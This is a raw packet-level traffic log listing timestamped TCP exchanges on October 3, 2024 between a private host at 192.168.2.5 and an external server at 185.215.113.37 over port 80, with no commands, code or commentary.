Oct 3, 2024 21:36:14.552109957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552118063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552124977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552131891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552146912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552160978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552359104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552367926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552393913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552405119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552556038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552566051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552575111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552584887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552598000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552602053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552611113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552620888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552627087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552637100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552642107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552654028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552666903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552675962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552681923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552694082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.552701950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552712917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.552723885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553139925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553148985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553158045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553168058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553178072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553184986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553194046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553201914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553210020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553217888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553225040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553235054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553241968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553262949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553277016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553556919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553565979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553575039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553585052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553596020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553601027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553623915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553632975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553905010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553915024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553925037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553935051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553945065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553951979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553960085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553970098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553976059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.553986073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.553989887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554006100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554017067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554024935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554038048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554044008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554052114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554061890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554069042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554078102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554085016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554094076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554099083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554107904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554116964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554127932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554146051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554594040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554603100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554611921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554636955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554658890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554743052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554752111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554761887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554778099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554783106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554790974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554806948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554812908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554821968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554831982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554837942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554850101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554855108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554862976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554871082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554882050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554887056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554893970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554900885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554909945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554918051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554927111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554932117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554946899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.554951906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554959059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.554975033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555555105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555566072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555574894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555584908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555593967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555600882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555620909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555641890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555655956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555665970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555675983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555690050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555695057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555704117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555710077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555720091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555727959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555736065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555746078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555753946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555759907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.555778980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.555794954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556423903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556432962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556442022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556452990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556464911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556469917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556478024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556488991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556499004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556499004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556507111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556516886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556524038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556533098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.556549072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.556571007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.571080923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571125031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571136951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571171999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.571192026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.571254015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571263075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571271896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571283102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.571294069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.571330070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638294935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638339996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638354063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638365984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638387918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638405085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638415098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638425112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638451099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638465881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638531923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638540983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638565063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638580084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638705969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638715982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638725996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638736010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638744116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638753891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.638761044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638797998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.638994932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639007092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639015913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639028072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639046907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639055967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639065981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639075041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639086962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639091969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639101028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639112949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639117956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639137983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639153957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639441013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639450073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639460087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639468908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639476061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639484882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639487982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639496088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639501095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639506102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639512062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639597893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639925957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639935970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639945030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639955997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639965057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.639975071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639983892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.639991045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640000105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640010118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640018940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640028000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640041113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640062094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640301943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640338898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640460968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640471935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640480995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640491009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640497923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640506983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640518904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640522957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640532017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640542030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640548944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640558004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640563965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640573025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640583038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.640592098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640616894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.640994072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641004086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641012907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641022921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641028881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641064882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641228914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641237974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641247988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641257048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641264915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641273975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641285896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641290903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641311884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641328096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641333103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641341925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641350985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641360998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641366959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641376019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641382933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641392946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641402960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641410112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641418934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.641427040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.641453981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642158031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642179012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642189026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642204046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642209053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642218113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642232895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642237902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642246962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642260075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642263889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642272949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642280102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642287970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642296076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642303944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642313004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642323971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642329931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642338991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642349005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642355919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642364025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642373085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642379999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.642390966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.642409086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643048048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643069983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643079996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643090963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643095970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643105984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643115997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643121958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643130064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643141031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643150091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643157005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643167973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643172979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643182039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643191099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643198013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643207073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643217087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643228054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643244982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643251896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643260956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643280983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643306017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643670082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643681049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.643707037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.643716097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.657934904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.657985926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.657995939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.658003092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.658071995 CEST	49704	80	192.168.2.5	185.215.113.37
